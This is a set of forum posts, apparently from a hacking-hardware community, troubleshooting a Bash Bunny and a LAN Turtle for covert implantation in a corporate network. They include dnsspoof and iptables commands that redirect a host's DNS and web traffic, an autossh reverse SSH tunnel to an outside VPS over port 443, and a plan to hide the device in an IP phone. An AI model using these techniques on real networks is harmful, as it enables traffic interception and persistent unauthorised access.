kanalia

Hi Gents I tried to assign a random hex to variables but this does not seem to work: VID=var="VID_0X"$(printf "%04X" $RANDOM) PID=var="PID_0X"$(printf "%04X" $RANDOM) ATTACKMODE RNDIS_ETHERNET $VID $PID I need to find the script that executes the payload. Maybe the variables are not resolved. Any suggestions? regards

Hi Bunny hoppers The Bunny works on the principle that hosts detect it as 2Gb Ethernet. It then takes precedence over other networks. I noticed that if plugged in for the first time it works every time. If connected more than one time it sometimes detects with speed of 0 (images attached) which makes Bunny useless. Has anyone else experienced this? If I uninstall the driver and plug in again it will detect as 2Gb.

Works like a charm if Bunny detects as 2Gb adapter (takes precedence over host's NIC) https://github.com/pojebus/bashbunny-payloads/tree/master/payloads/library/dns_spoofer

I figured it out, the interface must be specified when using dnsspoof. regards

I also tried to achieve this by spoofing dns: Enable port forwarding echo 1 > /proc/sys/net/ipv4/ip_forward Configure iptables to forward udp traffic on port 53 iptables -t nat -A PREROUTING -i usb0 -p udp --destination-port 53 -j REDIRECT --to-port 53 Create hosts file - nano hosts, create entry 172.16.64.1 * Run dnsspoof dnsspoof -f hosts No luck either. Any help much appreciated. regards, Mike

Hi Folks Just wonder if it would be possible to redirect all the host traffic to apache server running on bunny. I have installed apache and can browse it from host. I enabled port forwarding: echo "1" > /proc/sys/net/ipv4/ip_forward and added following iptables rules: iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.64.1:80 iptables -t nat -A POSTROUTING -j MASQUERADE Please excuse if I am doing something silly. I am a newbie. regards, Mike

Right folks, I do not know if this is coincedence but it works every time if i change the syntax on VPS. My pc at work is behind firewall so I can reverse ssh to my VPS only through port 80 or 443. I have changed the ssh settings (etc/config/autossh) to: option ssh '-i /root/.ssh/id_rsa -N -T -R 2222:localhost:22 turtlessh@X.X.X.X -p 443' and then on my VPS: ssh -p 2222 root@localhost This works every time. Previosly i called ssh root@localhost -p 2222 which intermitently connected to turtle but most of the time it thrown a 'Connection refused' error. Please give this a try and let me know if it works. I lost my hair overnight, so embarasing. P.S. I hate computers! I was not born to do it. Unfurtunatelly there is nothing else I could do to pay the bills :)

Hi, Can you please kindly explain the following settings: option gatetime '0' option monitorport '20000' option poll '600' taken from etc\config\autossh. I have a problem with autossh. When I plug my turtle with Ethernet cable already attached it won't work. I need to wait for the orange light to stop blinking, then attach the Ethernet cable, autossh works like a charm then. I thought that if I could delay executing the ssh command maybe it would work with Ethernet cable attached as well. I was going to embed the turtle in IP office phone, where turtle pins will be soldered to the PCB of the phone (which translates to Ethernet cable attached when powering Turtle). I really need to get it working. Any help much appreciated, regards, kanalia

Has anyone found a cure to this problem? I am experiencing this too. If i plug my turtle into computer with Ethernet cable attached it wont autossh. I have to plug it in, wait for the orange light to stop blinking then attach Ethernet cable. Also can anyone explain the settings from autossh config file: option gatetime '0' option monitorport '20000' option poll '600' much appreciated, kanalia

Thanks, I watched the movie and made some changes but did not resolve it. Can you by any chance have a quick peek at my config and maybe you will be able to spot what's wrong. I am losing the plot. Turtle networks (I bridged both NIC's so both are allocated IP by DHCP): Turtle network configuration: Turtle's firewall configuration: Laptop's network (second client connected to VPN server): OpenVPN server config: To all clever people (clearly I do not belong to this group :) ), any help would by much appreciated. Regards

Hi clever people! I have recently watched Darren's clip on how to configure my turtle with OpenVPN server. I created a VPS in the cloud, installed VPN server and configured users as per tutorial. Both users can now connect to VPN server but I can only ping turtle form my laptop. The network the turtle is on is not accessible. Clearly I am missing something. Any help would be much appreciated. Best regards

This is now resolved. Go to etc/config/network and change the config for 'lan' to: config interface 'lan' option ifname 'eth0 eth1' option type 'bridge' option proto 'dhcp' Both interfaces are assigned an ip by DHCP.

Hi Chaps I have just created a virtual server on azure. The corporate network's firewall blocks port 22 so I added an endpoint which translate port 443 to 22 - great! I can now ssh to my server. I have created a key pair and copied it to the server via turtle. I went to autossh configuration screen and am a bit puzzled. How should I configure it if the only ports that are not blocked are 80 and 443?? regards

Hi Chaps I have figured it out myself. Simply go to etc/config/network and change the config for 'lan' to: config interface 'lan' option ifname 'eth0 eth1' option type 'bridge' option proto 'dhcp' This bridge will make both adapters visible to target network so both adapters will be allocated an IP by DHCP. Have fun!!

Hi Chaps I posted this question before but I am going to go into details a bit more this time. This is the current config of the device: config interface 'loopback' option ifname 'lo' option proto 'static' option ipaddr '127.0.0.1' option netmask '255.0.0.0' config globals 'globals' option ula_prefix 'fda4:1103:3ec4::/48' config interface 'lan' option ifname 'eth0' option force_link '1' option type 'bridge' option proto 'static' option ipaddr '172.16.84.1' option netmask '255.255.255.0' option ip6assign '60' config interface 'wan' option ifname 'eth1' option macaddr '00:e0:4c:36:1c:12' option proto 'dhcp' config interface 'vpn' option ifname 'tun0' option proto 'dhcp' config interface 'wan6' option ifname '@wan' option proto 'dhcpv6' As you can see the Ethernet end is configured to be served an IP by DHCP, the host will be allocated an IP in 172.16.84.* range and then both networks are bridged. In domain environment I can access the internet but I am not on domain any more which makes Turtle useless in this case. So the question is - is it possible to have 'lan' on the same network as 'wan'? Regards, kanalia

Thanks telot Assigning client mac to turtle was one of the first ideas actually. That did not work either. The more I think about it the more I realize this will not be possible. The turtle would have to basically copy settings between interfaces. I will give it more time, maybe I will come up with something. The good thing is my employer knows about everything as he founds my education so I can use our corporate network as firing range :) regards

Hi chaps I received my turtle yesterday, so, so exciting. I took it to work today to as per Use Cases "covertly install it inside a corporate network". The DHCP assigned an IP to turtle, the turtle assigned an IP to PC but guess what? I am disconnected from domain now. This is not very "covert" as I lost all my privileges assigned to my domain user. All the network shares I could access before are gone. I am new to ethical hacking but it seems to me this device in useless on corporate networks. Am I missing something? regards, Kanalia